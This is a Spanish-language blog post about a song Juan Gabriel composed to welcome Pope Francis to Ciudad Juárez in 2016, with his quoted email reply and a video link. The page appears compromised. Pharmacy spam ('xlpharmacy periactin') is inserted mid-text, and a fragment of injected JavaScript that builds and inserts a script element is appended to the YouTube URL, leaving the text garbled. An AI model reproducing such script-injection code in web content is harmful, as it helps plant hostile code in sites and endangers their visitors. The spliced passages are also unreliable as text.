Canción que Juan Gabriel compuso a Ciudad Juárez, por la visita del Papa Francisco

Comparte !

El 17 de febrero de 2016 el Papa Francisco visitaba la Ciudad de Juárez, México. Y es por eso que se dio a conocer a mediados de enero de 2016 una canción especial que Juan Gabriel compuso para Ciudad Juárez.

A días de la visita del Papa Francisco a territorio mexicano, Juan Gabriel uno de los compositores más importantes del país, compuso una canción inédita para darle la bienvenida al Pontífice a su paso por Ciudad Juárez.

JGCF: Cancion que Juan Gabriel compuso por la visita del Papa Francsico

xlpharmacy periactin Como nace la canción dedicada al Pontifice:

El. Sr. Don Federico de la Vega, ya fallecido, establece comunicación con una persona allegada al Sr. Alberto, que es importante su asistencia y por ese medio le hace la invitación por la visita de su Santidad y es ahí donde contesta lo siguiente:

Que cosas no? quien lo diría que un papa visitará nuestra ciudad… Que honor 🙂 a ver que se me ocurre con la bendición de Dios… 🙂 dijo el Sr Alberto Aguilera Valadez “Juan Gabriel” por correo electrónico.-

Sin más agregado a las palabras de “Nuestro Divo” les dejamos el video para que volvamos a revivirlo:

[VIDEO, A Juarez – Video OFICIAL]

https://youtu.be/ptDQUTKHpzIdocument.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

Un comentario sobre “Canción que Juan Gabriel compuso a Ciudad Juárez, por la visita del Papa Francisco

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares